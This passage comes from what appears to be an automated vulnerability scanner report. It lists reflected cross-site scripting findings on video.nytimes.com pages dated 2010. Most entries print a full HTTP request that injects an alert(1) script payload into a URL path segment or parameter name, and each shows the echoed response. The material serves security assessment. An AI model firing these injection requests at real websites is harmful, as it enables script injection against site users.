Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:28 GMT
Content-type: text/html
Content-Length: 233658

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/22767f2"><script>alert(1)</script>c70020ad194/dining/1248068993538/ricotta-cheese-gnocchi.html">
...[SNIP]...

3.307. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 285f1"><script>alert(1)</script>ee39669c993 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/22/dining285f1"><script>alert(1)</script>ee39669c993/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:10 GMT
Content-type: text/html
Content-Length: 249638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/22/dining285f1"><script>alert(1)</script>ee39669c993/1248068993538/ricotta-cheese-gnocchi.html">
...[SNIP]...

3.308. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c34'%3b002fe85984d was submitted in the REST URL parameter 5. This input was echoed as 55c34';002fe85984d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/22/dining55c34'%3b002fe85984d/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:19:11 GMT
Content-type: text/html
Content-Length: 249537

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
%20traditional%20potatoes.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'dining55c34';002fe85984d' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
...[SNIP]...

3.309. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79b31"%3bcafe286b57b was submitted in the REST URL parameter 5. This input was echoed as 79b31";cafe286b57b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/22/dining79b31"%3bcafe286b57b/1248068993538/ricotta-cheese-gnocchi.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:18:29 GMT
Content-type: text/html
Content-Length: 249520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytdining79b31";cafe286b57b";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "dining79b31";cafe286b57b";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.310. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a464"><script>alert(1)</script>b2ef5312de8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html?5a464"><script>alert(1)</script>b2ef5312de8=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:15:00 GMT
Content-type: text/html
Content-Length: 249502

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html?5a464"><script>alert(1)</script>b2ef5312de8=1">
...[SNIP]...

3.311. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f81a2"><script>alert(1)</script>e5ec6d199e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010f81a2"><script>alert(1)</script>e5ec6d199e6/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:29 GMT
Content-type: text/html
Content-Length: 233680

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010f81a2"><script>alert(1)</script>e5ec6d199e6/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html">
...[SNIP]...

3.312. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770bc"><script>alert(1)</script>c07a57170dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10770bc"><script>alert(1)</script>c07a57170dd/22/nyregion/1248069217296/city-critic-patrolling-the-city.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:38 GMT
Content-type: text/html
Content-Length: 233680

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10770bc"><script>alert(1)</script>c07a57170dd/22/nyregion/1248069217296/city-critic-patrolling-the-city.html">
...[SNIP]...

3.313. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19302"><script>alert(1)</script>522222ec894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html?19302"><script>alert(1)</script>522222ec894=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:14:00 GMT
Content-type: text/html
Content-Length: 238727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html?19302"><script>alert(1)</script>522222ec894=1">
...[SNIP]...

3.314. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f6aa"><script>alert(1)</script>65a3cb3cced was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/20108f6aa"><script>alert(1)</script>65a3cb3cced/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:00 GMT
Content-type: text/html
Content-Length: 233687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/20108f6aa"><script>alert(1)</script>65a3cb3cced/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.315. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d322"><script>alert(1)</script>99d3d3da6ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/109d322"><script>alert(1)</script>99d3d3da6ca/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:20 GMT
Content-type: text/html
Content-Length: 233686

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/109d322"><script>alert(1)</script>99d3d3da6ca/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.316. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f415d"><script>alert(1)</script>f8c9aac263e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/23f415d"><script>alert(1)</script>f8c9aac263e/world/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:16:40 GMT
Content-type: text/html
Content-Length: 233686

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/23f415d"><script>alert(1)</script>f8c9aac263e/world/asia/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.317. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37464"><script>alert(1)</script>84aa575cb62 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/23/world37464"><script>alert(1)</script>84aa575cb62/asia/1248069229316/chinas-new-wave-music-festivals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:17:11 GMT
Content-type: text/html
Content-Length: 233687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/23/world37464"><script>alert(1)</script>84aa575cb62/asia/1248069229316/chinas-new-wave-music-festivals.html">
...[SNIP]...

3.318. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96257'%3be85a1e8f6a1 was submitted in the REST URL parameter 5. This input was echoed as 96257';e85a1e8f6a1 in the application's response.

